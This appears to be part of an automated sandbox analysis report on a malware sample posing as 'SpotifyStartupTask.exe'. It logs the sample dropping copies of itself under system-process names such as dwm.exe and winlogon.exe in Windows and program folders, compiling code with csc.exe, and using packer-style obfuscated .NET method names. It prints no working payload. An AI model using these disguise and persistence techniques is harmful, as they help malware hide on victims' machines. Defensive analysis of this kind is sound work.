                              Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeDirectory created: C:\Program Files\7-Zip\Lang\winlogon.exeJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeDirectory created: C:\Program Files\7-Zip\Lang\cc11b995f2a76dJump to behavior
                              Source: SpotifyStartupTask.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                              Source: SpotifyStartupTask.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                              Source: SpotifyStartupTask.exeStatic file information: File size 2019328 > 1048576
                              Source: SpotifyStartupTask.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1ec800
                              Source: SpotifyStartupTask.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2482149517.000000001BB76000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: :C:\Users\user\AppData\Local\Temp\qfasrhtc\qfasrhtc.pdb source: SpotifyStartupTask.exe, 00000000.00000002.1264186462.0000000003348000.00000004.00000800.00020000.00000000.sdmp

                              Data Obfuscation

                              barindex
                              .NET source code contains method to dynamically call methods (often used by packers)
                              Source: SpotifyStartupTask.exe, VEVhb7XLtaEPLCTTawQ.cs.Net Code: Type.GetTypeFromHandle(AW1Rey4jZMVuIAtsvyT.awQ82OyVQYc(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(AW1Rey4jZMVuIAtsvyT.awQ82OyVQYc(16777245)),Type.GetTypeFromHandle(AW1Rey4jZMVuIAtsvyT.awQ82OyVQYc(16777259))})
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qfasrhtc\qfasrhtc.cmdline"
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qfasrhtc\qfasrhtc.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeCode function: 0_2_00007FF88B4E00BD pushad ; iretd 0_2_00007FF88B4E00C1
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeCode function: 0_2_00007FF88B4E5368 push cs; ret 0_2_00007FF88B4E5379
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeCode function: 0_2_00007FF88B642E06 push ebx; ret 0_2_00007FF88B642E09
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeCode function: 0_2_00007FF88B8E5BC1 push esi; retf 0_2_00007FF88B8E5BC7
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeCode function: 0_2_00007FF88B8E1595 push edx; ret 0_2_00007FF88B8E1596
                              Source: C:\Windows\DiagTrack\dwm.exeCode function: 24_2_00007FF88B4F59E1 push ds; retf 24_2_00007FF88B4F5A0F
                              Source: C:\Windows\DiagTrack\dwm.exeCode function: 24_2_00007FF88B4E79C7 push ebp; ret 24_2_00007FF88B4E79C8
                              Source: C:\Windows\DiagTrack\dwm.exeCode function: 24_2_00007FF88B4E71AE push cs; iretd 24_2_00007FF88B4E71AF
                              Source: C:\Windows\DiagTrack\dwm.exeCode function: 24_2_00007FF88B4D00BD pushad ; iretd 24_2_00007FF88B4D00C1
                              Source: C:\Windows\DiagTrack\dwm.exeCode function: 24_2_00007FF88B4D5368 push cs; ret 24_2_00007FF88B4D5379
                              Source: C:\Windows\DiagTrack\dwm.exeCode function: 25_2_00007FF88B4F00BD pushad ; iretd 25_2_00007FF88B4F00C1
                              Source: C:\Windows\DiagTrack\dwm.exeCode function: 25_2_00007FF88B4F5368 push cs; ret 25_2_00007FF88B4F5379
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeCode function: 26_2_00007FF88B4E79C7 push ebp; ret 26_2_00007FF88B4E79C8
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeCode function: 26_2_00007FF88B4E71AE push cs; iretd 26_2_00007FF88B4E71AF
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeCode function: 26_2_00007FF88B4F59E1 push ds; retf 26_2_00007FF88B4F5A0F
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeCode function: 26_2_00007FF88B4D00BD pushad ; iretd 26_2_00007FF88B4D00C1
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeCode function: 26_2_00007FF88B4D5368 push cs; ret 26_2_00007FF88B4D5379
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeCode function: 27_2_00007FF88B4C00BD pushad ; iretd 27_2_00007FF88B4C00C1
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeCode function: 27_2_00007FF88B4C5368 push cs; ret 27_2_00007FF88B4C5379
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 28_2_00007FF88B4F79C7 push ebp; ret 28_2_00007FF88B4F79C8
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 28_2_00007FF88B4F71AE push cs; iretd 28_2_00007FF88B4F71AF
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 28_2_00007FF88B5059E1 push ds; retf 28_2_00007FF88B505A0F
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 28_2_00007FF88B4E00BD pushad ; iretd 28_2_00007FF88B4E00C1
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 28_2_00007FF88B4E5368 push cs; ret 28_2_00007FF88B4E5379
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 29_2_00007FF88B4E00BD pushad ; iretd 29_2_00007FF88B4E00C1
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 29_2_00007FF88B4E5368 push cs; ret 29_2_00007FF88B4E5379
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 29_2_00007FF88B4F79C7 push ebp; ret 29_2_00007FF88B4F79C8
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 29_2_00007FF88B4F71AE push cs; iretd 29_2_00007FF88B4F71AF
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 29_2_00007FF88B5059E1 push ds; retf 29_2_00007FF88B505A0F
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 29_2_00007FF88B642E06 push ebx; ret 29_2_00007FF88B642E09
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 29_2_00007FF88B8E1595 push edx; ret 29_2_00007FF88B8E1596
                              Source: SpotifyStartupTask.exeStatic PE information: section name: .text entropy: 7.575623645429234
                              Source: dwm.exe.0.drStatic PE information: section name: .text entropy: 7.575623645429234
                              Source: PQ4HCWgZazguIsFyU1PhJ.exe.0.drStatic PE information: section name: .text entropy: 7.575623645429234
                              Source: dxLy2s6A.exe.0.drStatic PE information: section name: .text entropy: 7.575623645429234
                              Source: winlogon.exe.0.drStatic PE information: section name: .text entropy: 7.575623645429234
                              Source: SpotifyStartupTask.exe, nBWRulnX6Omlss7TLyG.csHigh entropy of concatenated method names: 'nwRn4s4Tpy', 'cTQneSkGaH', 'oJlnzOuG2a', 'nSE3pfgWgU', 'BQW3kb3eAV', 'Hhy384ZyEF', 'l0Q3GgQQ5R', 'pNx39Q7rg2', 'br232k9ar3', 'FDN3FGZAg5'
                              Source: SpotifyStartupTask.exe, aBOP2lkjJK6wxCBFRNh.csHigh entropy of concatenated method names: 'jtckNYSisK', 'r6tkQt53wj', 'WFRkL0AYSe', 'oRNHtxk7NCMGJ6vfhYUQ', 'R7cJAJk7QoeSsQ85MOHG', 'v4mnLHk7Ly0xbj1HGBBn', 'TEUM6gk7Ed2Eu0CFindn', 'cEPyLBk7IoCXk95E4eMr', 'CNZPwbk7OxjilwdLQods'
                              Source: SpotifyStartupTask.exe, YYwk4H824DeqJFbEQsU.csHigh entropy of concatenated method names: 'xrv8rGwfw3', 'slU8dAPa73', 'XcP8aDnDOM', 'aq68CeUtT0', 'uwNIjYkYHE58bBSJfyE4', 'BsdqRbkYCRwkRl5OJyjF', 'tEqZUekYJQyKpmGpghSW', 'oM02YXkYvDR2jUBr35LP', 'KKIKIPkYjHorTP0dT6Hr', 'H3eZeEkYx3Eplckgxuxt'
                              Source: SpotifyStartupTask.exe, gBBCXvd7wBZ7aalDWcl.csHigh entropy of concatenated method names: 'RVUd0oXTjO', 'KfyduVt1td', 'qrCdfNY6KE', 'VCgdSZc3ah', 'dBqdTsAWrh', 'Qaadwp95JR', 'd83X9xkw6AopfmC8jmv8', 'RQRW9Bkwq1tm61UFqsmv', 'wYoprqkwt9t2T583C0tj', 'k3TKWdkwmOYFikEXRt1d'
                              Source: SpotifyStartupTask.exe, PiRMDmYyiHx2FJMWZNU.csHigh entropy of concatenated method names: 'l48YMEcxvX', 'wYxY6coL0C', 'wjTYqc0qpp', 'D0OylVksuqeCJyOm9drY', 'sXcnQUksYE8HBbk0rHLY', 'c4HpvMks0y34j0Y5MbXx', 'Cd1AFeksfqyqHH704Rxe', 'jOROk7ksSAqUA2mCmBSS', 'u0tj92ksTlUhcJsVUPcE', 'Gb4gdQksw80LX46VBxZt'
                              Source: SpotifyStartupTask.exe, MBXKN80fvdg4os1N8Wi.csHigh entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
                              Source: SpotifyStartupTask.exe, UEOSyA2trojk1TcdDoG.csHigh entropy of concatenated method names: 'k6q2crSorw', 'Crf24umMPq', 'GBl2eC3GFV', 'TTW2zP5YBx', 'YyvFpS14rO', 'OLKFkGpX2j', 'c11F8TWwjM', 'zXkF2JkSjO1vlO9Z7FRh', 'QE4ZJvkSHYRRDyBMm5B3', 'oMmrOGkSv46xjQdGmG6U'
                              Source: SpotifyStartupTask.exe, HWYD281lYAELKxU2IK4.csHigh entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'B8ZICJkmOSZZh7jx7Sca', 'SlC0jhkmERK3CKfIV3o3', 'D6HP25kmIBFfCDwoe0SH'
                              Source: SpotifyStartupTask.exe, HHkeACIYrFAZ1SYRE2I.csHigh entropy of concatenated method names: 'SL2I1ASDA9', 'Y5X4HYknXdv7SZXBFXtg', 'zX85gckncZURCDUwt9Yw', 'JmcsHtkn44hUvBKt3BpL', 'j3SIuGr56G', 'KpEIfcGeGR', 'PEnISCKPpo', 'Hmfq50knUD6MysCEagDv', 'CLdVJfknACQr0vpF8dta', 'gnM6J5kntxqg5XOLg1RX'
                              Source: SpotifyStartupTask.exe, FC0SAh8fhBlwx5PTdtD.csHigh entropy of concatenated method names: 'dNg8hZYxUh', 'omU8b4Rl2Z', 'V7ICahkYwv3u0LadD4Rx', 'IpL0sokYll9D2Aw3PmdT', 'xbC97AkY1jGERLtR5eVy', 'chv8sVqhiU', 'xWublckY3aPeidn5qeX9', 'u1h2T0kYBZShnJoAiJGI', 'VXp9SakYnlPx1701Qdym', 'tkdCMqkYhbnZ7CFZU6w2'
                              Source: SpotifyStartupTask.exe, VEVhb7XLtaEPLCTTawQ.csHigh entropy of concatenated method names: 'sflHKmkccjOcgaosWnoS', 'RGYrBLkc4xGtbyJORy7Z', 'bOVcUHqwqG', 'X2B9FCk4kuAejsar9vlx', 'vPTXXvk48UTDcq8ganLb', 'QdNOBgk4G5ZhWOemELQU', 'DZmxQak49397I5cGqPEi', 'zkHXf0k42m0ly4glynso', 'XHujbhk4FMTuhKIsg3s2', 'n4KrdGk4rr1l84BlePWd'
                              Source: SpotifyStartupTask.exe, C2i6n4OjpyunJgFGRME.csHigh entropy of concatenated method names: 'PL3OOkWCcc', 'k3s9euk3MAOPEoifwsib', 'igVJyTk364VoXIswqwsx', 'CxQmXYk3ykCBFUGN7sTa', 'H7itxZk3shuNN46F0VSw', 'lN4ONBiAV2', 'pDusfvk3nYQ90qThTjv3', 'paCSVhk33kSNc7U69anm', 'TDc2j1k3hBNLv9nIycdo', 'hdqHCnk3banJtci2MNSb'
                              Source: SpotifyStartupTask.exe, ppGODaaj82Y2qaFMvU1.csHigh entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'GZQG2cklwccB3Z14HU0O', 'bwZCfQkllEFdFVBflJk9', 'neLR03kl1nwjPO7NrJSM', 'DjdNZhklDuTHrSMhmdEY'
                              Source: SpotifyStartupTask.exe, m8lXwkgv3C2MEZvmZ1g.csHigh entropy of concatenated method names: 'ctuVkptsNr', 'zyyoeXkZQWvQmHBrK101', 'GwHkkLkZxbk6MQLUka5T', 'N2woXQkZNrvoAf206euS', 'dhEgxZKRdK', 'LacgNHLdp1', 'QeegQJOY0s', 'xcQgLN1exZ', 'fnAgEgXCSt', 'SrxgIWH8HB'
                              Source: SpotifyStartupTask.exe, yex1Y0KkmSThTPm3pFH.csHigh entropy of concatenated method names: 'rC9', 'method_0', 'yrWkdIAn867', 'R6mkdOTl4ma', 'TuhvbGkhfiobTYboAQ5N', 'lHwnnCkhSyYFBuwHFmId', 'aLKV4ekhTcxWqODXtGtZ', 'dkU84BkhwqOKpJaJ1Pui', 'M1UsNBkhlGKNqR9orrZv', 'ukREwBkh1PQdj2jbAQgG'
                              Source: SpotifyStartupTask.exe, V9SULB03DWLrowIj7MO.csHigh entropy of concatenated method names: 'Dlw0bUxbLy', 'O5I0ZMvo0v', 'EKh0556AUS', 'dH30y67Ivg', 'POo0s9FoDF', 'sOP0MbJAis', 'B80060Qx9m', 'AZk0qt0O1v', 'zAs0tNwwNF', 'oem0m3PuPP'
                              Source: SpotifyStartupTask.exe, GRAgZ0IUwwMFLxjKQdC.csHigh entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'qi0kdv7hXwe', 'pghk9y8fWFx', 'z1AjJEk3NDtyoskEfPjh', 'Al6fTbk3Qx72kQyv1Wbc', 'rraps8k3LgrEIk3yNXRC', 'PpKY8Bk3EG5mhDFrEdX6', 'BEU164k3I7K4ZbLr4jKm'
                              Source: SpotifyStartupTask.exe, QQxZotkEa485XUASm9m.csHigh entropy of concatenated method names: 'RTM', 'KZ3', 'H7p', 'eeS', 'imethod_0', 'XbG', 'KcpkrzEWPFm', 'Kpik9k3PN1p', 'YkMaDHk7gU4lAZk41ES3', 'gOjYfwk7idfdJIveJk2c'
                              Source: SpotifyStartupTask.exe, weUmwkueiW0XPan7VDp.csHigh entropy of concatenated method names: 'yFAfpv9sid', 'fyWfkjPeR0', 'Yd7', 'vHrf8464qj', 'EnWfGD3pRi', 'dXBf9fjIH5', 'UTvf2PYaV0', 'wFqXufk6MFUDm5NRl79r', 'MwZSEHk6ybMIxeXb5fqA', 'kaPDmak6su785YvO5VA2'
                              Source: SpotifyStartupTask.exe, yvuXKQUDystYCuV1oGx.csHigh entropy of concatenated method names: 'HSqkdRKJra0', 'POykFoVCwTy', 'nJRSMPkWzgM8NaVvVHv0', 'rViF96kW4GTlW1tOUAPZ', 'ic0j7vkWeT51Av25EmB5', 'o0lCZgkXpnGgN3Dtg2X2', 'CKX4MIkX9YaveR8qaMeB', 'omvBUSkX8TdAv2viNDp9', 'cd0HjEkXGXuJVlM2xJAo', 'eNMrnCkX22uIIC30c3ps'
                              Source: SpotifyStartupTask.exe, i1HgaHGRxgRjmQG1GIf.csHigh entropy of concatenated method names: 'XP6Gb922CV', 'HyBGZEj9o9', 'Q1DG5T3B1S', 'FqdJBqk03w843OQMptIn', 'JRR3wqk0h7Ghud2xJtad', 'e9huKtk0Beg8Yul3WCFA', 'F74BkUk0nOdeBDWu4NMr', 'SAZGY8nhwS', 'DksG0kQ0Lc', 'VdfGuQN7EQ'
                              Source: SpotifyStartupTask.exe, bCJsQprIqQMiWOpELQU.csHigh entropy of concatenated method names: 'xWLrYEOvq0', 'KQdLiIkT3DGTCSkOCPAo', 'SUWVgYkThYosXg02n3xb', 'zWLRDmkTBvd4CbgxhC8l', 'DECc8qkTn6yZGX6SK6uL', 'FIMfIAkTbxS6bKRwh2oQ', 'jByoYkkTZKYIoClGlxhh', 'lCNrKCThRH', 'OcjrghXaqX', 'gsTriqDkAr'
                              Source: SpotifyStartupTask.exe, G2pbkTrfMFEDSxODFEK.csHigh entropy of concatenated method names: 'VtOrTcmhhW', 'KHIrwfTY4M', 'U6YUZekTMEHEyt3nYWNj', 'hueeqEkTy47Vgs1yJqR1', 'AS2BGLkTsW0uf7Y4oxNj', 'zXThAKkT6roUahplXupt', 'tF3qErkTq5jPKXLiapIa', 'JpdWUEkTtGjIBiHGa58S', 'sXhAOBkTm4pPpxXpkkti', 'c8uccXkTU02H8xNo9To2'
                              Source: SpotifyStartupTask.exe, ObXqHH2aCpECkBgYkI6.csHigh entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'oBOkd2Cfmcv', 'Kpik9k3PN1p', 'sxDNqWkfNvqVUAbcfEZo', 'Gu9dHYkfQhCkkPX5F2TD', 'jvK36ckfLfkCTKo5yOS4', 'PskHc9kfErejMIVHWSAu'
                              Source: SpotifyStartupTask.exe, XGhrQLnfw8mOh7isH1y.csHigh entropy of concatenated method names: 'ivKnTvdST2', 'FkLnw2uMlo', 'WksnlrDE67', 'kgEn1Igcca', 'lrinD7qxKd', 'kednBPC6Va', 'mOmnnubc0S', 'f0nn3CCIlW', 'jxknhvMa6V', 'SpFnb8QCVn'
                              Source: SpotifyStartupTask.exe, QwCPo57hmw5q0yjJaOs.csHigh entropy of concatenated method names: 'DmM743bKEt', 'rdG7zj1gyf', 'Ov17ZWUBvH', 'PwM75StU20', 'UX67yiMOkQ', 'UR47s5vDVO', 'Fs47M47BEA', 'jUY76Aos5l', 'XWL7qas8AX', 'eJV7tIeJLB'
                              Source: SpotifyStartupTask.exe, WcTIdvBaKvu6dLbp5N7.csHigh entropy of concatenated method names: 'xdPBPq7KkF', 'HgNFUQkUG3xxa5vTc8P5', 'rGqtUWkUkFC5LraXaYhn', 'vd4i52kU83m1osUcH3vO', 'e0X6KIkU93ItN3eMleKv', 'h8wfuEkU2y6uR3Va9Muf', 'IPy', 'method_0', 'method_1', 'method_2'
                              Source: SpotifyStartupTask.exe, CwyWGbOBPUgDKOjP73O.csHigh entropy of concatenated method names: 'N2N', 'SyxkdxD9PVY', 'zXWO3L4JlI', 'HUMkdNPrnym', 'XDTbhUkhdXjjDCFw5qme', 'j1L0oWkha8nOka9gcWvH', 'zmjQJdkhF26hGQ9ZdTrP', 'c55DmakhruvTRtQYlksK', 'Oe5VQQkhCIqspmgkd5LP'
                              Source: SpotifyStartupTask.exe, xB7cUhRJ5JSLP2jHd2T.csHigh entropy of concatenated method names: 'zOPRvcr5UA', 'FAGRj8SL4S', 'sHARxhhwtT', 'ByZRNWW2Wl', 'zbcRQrrvLU', 'GIPCwcky8NwfeEFoScvQ', 'U3ICBekypmp6qPlYUu82', 'E997BfkykMWdDDa2Ke9L', 'h5DLuGkyGHUq118a0NlY', 'XFiE2cky98xe9yZFIEPO'
                              Source: SpotifyStartupTask.exe, p9hpm7VtcbLUt4n3S9e.csHigh entropy of concatenated method names: 'H1uVUTFyGg', 'TIBVA6DnCr', 'UqJVWEqWlB', 'XYDVXb6MNR', 'GgeVcjwKir', 'J4vXyRkZ3YsM5p1s3S5B', 'KMstR1kZhkPF6W0ClZq4', 'n97PlrkZb6QV5BntQGXk', 'KWAJsmkZZe2HCq74fPiP', 'tlNoq2kZ51guVppt8aVw'
                              Source: SpotifyStartupTask.exe, TdiUQ6RfwLN05C9LJdK.csHigh entropy of concatenated method names: 'method_0', 'OlcRT70aQ1', 'igxRwFACPv', 'oejRl04BmL', 'ghbR1CLBeT', 'rR7RDoh1sC', 'JgORBLIyoV', 'MIGQCOkyJB85iQ23jno5', 'N2Q5IFkyHKIZQ2sZPJMa', 'k4iLy6kyvBdD98IfgfVl'
                              Source: SpotifyStartupTask.exe, gU1poYwqkEDaErUb841.csHigh entropy of concatenated method names: 'ptwcY1ktA0eXpxkwPYVp', 'c7G3evktWG8FaRX5iCyT', 'op0JotktXbDFLYLFOLL7', 'STEwmPggvk', 'Mh9', 'method_0', 'pUDwUb86LB', 'r7kwAJI6Bf', 'EifwW1v4bC', 'Jl2wX6Fdhm'
                              Source: SpotifyStartupTask.exe, wYDlK2YenL884eiMxKy.csHigh entropy of concatenated method names: 'EK30pb3TXy', 'OOL0kVcURm', 'oGG08Lc7sx', 'kW80GBuXuT', 'h5O09AMlJU', 'rQZ02sPWDC', 'jPcax8ksM0l9qtnwTrB7', 'WNYd3fksy8VO2TT0vsYN', 'lqFobckssSYdx7XHOYe4', 'zslfG5ks61uUFasLZa1V'
                              Source: SpotifyStartupTask.exe, aMYxyvdyJUnD5TGFZ1N.csHigh entropy of concatenated method names: 'o5wdW9btbu', 'Ln8pKoklC9AiUBA5GkqK', 'tfK5dUkld2esL6ZMhCHC', 'rtss60klaLg43QnZVcf8', 'yp43aXklJmCbwWjYOyII', 'jpSj5pklHrWosVJg6NFq', 'P9X', 'vmethod_0', 'et3k97M5Sb4', 'imethod_0'
                              Source: SpotifyStartupTask.exe, h0jrLDxipkpPp7BSCDp.csHigh entropy of concatenated method names: 'J1hIv8wv28', 'rfqIjlNDY4', 'MWaRnTknDrReEdkOdGqu', 'nIh0MNknllSxxLk1oBYg', 'EbXg1dkn1jvrZfx5fMTV', 'Ren4AKknBGfqXMSxOUhM', 'rfBVf1knnvB8cLBauOCS', 'W9iIIJHeFa', 'hCnY2vknh4hGbNG7Of9G', 'WsWYl0knbAV62EB7obJM'
                              Source: SpotifyStartupTask.exe, vXgHIIL1UJvvIkHTHA.csHigh entropy of concatenated method names: 'rdowfkYLc', 'ShfiB7kRfheODVYLbRs9', 'y2V93EkRSXovwBNgtXqu', 'tGxopfkR0Kw8GntxLlsv', 'o1AmrkkRurjJ5KKMaEwu', 'WE3IciT6p', 'e5VOpUrkN', 'Ev5KmE9js', 'Huyg6f3Ge', 'DEKivVOc5'
                              Source: SpotifyStartupTask.exe, lEvMJXkUPYUc5KOrueA.csHigh entropy of concatenated method names: 'P9X', 'iQ3kWUCoiW', 'yLwkdp9ycsW', 'imethod_0', 'KULkXsVgyN', 'omy2k1k7Uq1Yf4uxspQo', 'O5PQKsk7Af1p9x1Oc4Bt', 'V2W4xZk7tvf0pmwTDAeq', 'XxuQ5tk7mNe6WZeVybHc', 'ca02cEk7WJ6meEJpJmjA'
                              Source: SpotifyStartupTask.exe, aq1n1ckeQ3Wa3bJktfC.csHigh entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'tRIkdkE9Lcq', 'Kpik9k3PN1p', 'Fk5hmAk7eSMTYdcBuOgs', 'w8SgZ4k7z3YTfTH4lidX', 'YT519skYpvjMeFy4jFaT', 'qut33AkYkp6NT6E9Gl3N'
                              Source: SpotifyStartupTask.exe, d5QA9XYmbOq0KBf4PSV.csHigh entropy of concatenated method names: 'z2dYAHhAQ2', 'O26YWPxDDe', 'FuiYXyHRtE', 'nqRYcCBXnY', 'kkgY4npVok', 'FlJfgQksnaJOVsDVHtvH', 'dF281eksDHjUUbTKNVST', 'YwYaJBksBw9nC8nO70LW', 'zywrdcks3wCPeUbVKSud', 'lSupZrksh8AtfO9ReyHM'
                              Source: SpotifyStartupTask.exe, iTYmJ47GC90uRnvy0kw.csHigh entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'YNx72wNgc5', 'Write', 'ALS7F09Oui', 'dJZ7rdgIBQ', 'Flush', 'vl7'
                              Source: SpotifyStartupTask.exe, qGQ89mrhP45lR7VdgWC.csHigh entropy of concatenated method names: 'DgprWy2x7R', 'RomrXnDHym', 'AI6ghxkwd98kdnBeTU6Q', 'gobolckwFZpK99CSpyhA', 'puJtNDkwr50A5SFWQkyr', 'Sx27pgkwa20gXMJHda3a', 'ey4rZDibnH', 'VTJr5fKncJ', 'qXmryVRaZx', 'T1QrsGuTKW'
                              Source: SpotifyStartupTask.exe, MxCOMX3lFMpVtlQyji0.csHigh entropy of concatenated method names: 'UE7QA7kA3tw5Dd2fEElF', 'tHRv96kAhlmMKhsKJEJP', 'IV0OIQkABV4ZCVtW6xtG', 'AlqOpJkAnBXjVN1g72k2', 'edZ3AxkAwVf1hWMvuGEs', 'D4utkMkAl4QFh7m2Fh8N', 'YYApVOkA1PjZJpcX0XUG', 'LnqisjkASOcg9laNUEyg', 'u4HTTXkATuMRSOoYhojW'
                              Source: SpotifyStartupTask.exe, vCNyt2XpHtppYNZBpBE.csHigh entropy of concatenated method names: 'tbKX9myX7J', 'aQxX24brBx', 'n5TRS4kclJwERac7oUVi', 'LpsiLjkc1qBfFTgUYDMi', 'mU1O4okcD1DpuVkv3Fpd', 'n0kkUOkcBF7VT2LO8cZg', 'RXuIiYkcnKHdtl2eMcMv', 'SQhX8VdN2q', 'doq9eMkcfVx1blrYFNlf', 'MgtxkKkcSo40g1oWxDQ8'
                              Source: SpotifyStartupTask.exe, Hw6lnS9oFD74wZIb6ay.csHigh entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'KcxkdG2JF9t', 'Kpik9k3PN1p', 'vVgkwRkuVPbeof8Jnk6B', 'BdGs2ZkuPFJNLqSyBlT6', 'K6v1VNkuomQKp3kjoyhY'
                              Source: SpotifyStartupTask.exe, EMMpjgPZg1lUGVBJZLW.csHigh entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'w8JPytBtSU', 'DNFPsRppgA', 'Dispose', 'D31', 'wNK'
                              Source: SpotifyStartupTask.exe, R5VXtJ9IBbRNNjTdByT.csHigh entropy of concatenated method names: 'KZ3', 'imethod_0', 'L3I', 'mfUkd8S5H6y', 'Kpik9k3PN1p', 'Drwea2kuLpFTweSGbOeU', 'UPq7GckuE7b4HvCy9NWD', 'r31I4WkuIR1JPZe7hDKQ', 'labLH4kuOWVrDQALFdDY', 'uFmLI7kuK2FUOqgY7M4S'
                              Source: SpotifyStartupTask.exe, Hws2PIoV1Xc33nYqOI5.csHigh entropy of concatenated method names: 'bg5oo06XJg', 'zfaoRItWG7', 'mwMo7eogKQ', 'YsZoYxM5vo', 'qaao0oGqtl', 'e3hHB7k5bcaOiLb0ZOGQ', 'fe7AZTk53OKBvXLfu7qV', 'o4GfZFk5hwHnMTx9mPlU', 'BbZrYik5ZQmG4cJx3evS', 'UfXahVk55HrZ1RFwB36u'
                              Source: SpotifyStartupTask.exe, DaHgNN2NWiYooYxELI0.csHigh entropy of concatenated method names: 'XAE278RY7h', 'aIA2YmEY68', 'weW20V4wxx', 'xcUQ2skfBI8JV1ZWXGcu', 'gQYIEBkfnhmxxwJvpxxJ', 'SdOlyNkf1K2bUkLrGL0e', 'Eydq0WkfDKDqCtdZ7Ace', 'Xmh2V38AXU', 'qSn2PV2FwY', 'bGsSShkfTA3R8neRiuWx'
                              Source: SpotifyStartupTask.exe, oFwbRyu5qLHgu1eKfZr.csHigh entropy of concatenated method names: 'lEMuscw4EM', 'ygeuMddTpr', 'sAxu6P02xJ', 'zNauqINXXm', 'DQGutWEVUl', 'eRHVXkk6wDDt0TyU3EOE', 'CWxh0Gk6l9HlNAXKVSr9', 'nlkASrk61bGH0HbtJlaG', 'HcPUDRk6S9BMxQa1iMiE', 'NsxKZvk6T99l9H10muYO'
                              Source: SpotifyStartupTask.exe, AVI6MKWfUa22l0oELIL.csHigh entropy of concatenated method names: 'GZOWTBCCf7', 'HRuWwuocYi', 'QobWl5o2dv', 'eLnW1SfmUL', 'Dispose', 'NfIQAYkcJhTwMMmq8Veg', 'c5Xy9SkcaHkHNPMquODl', 'oHeAFVkcCNf9yRUJm7lj', 'VHT8l4kcHBmBRtd5hBew', 'OMQoRakcvJ0Y9jooV33o'
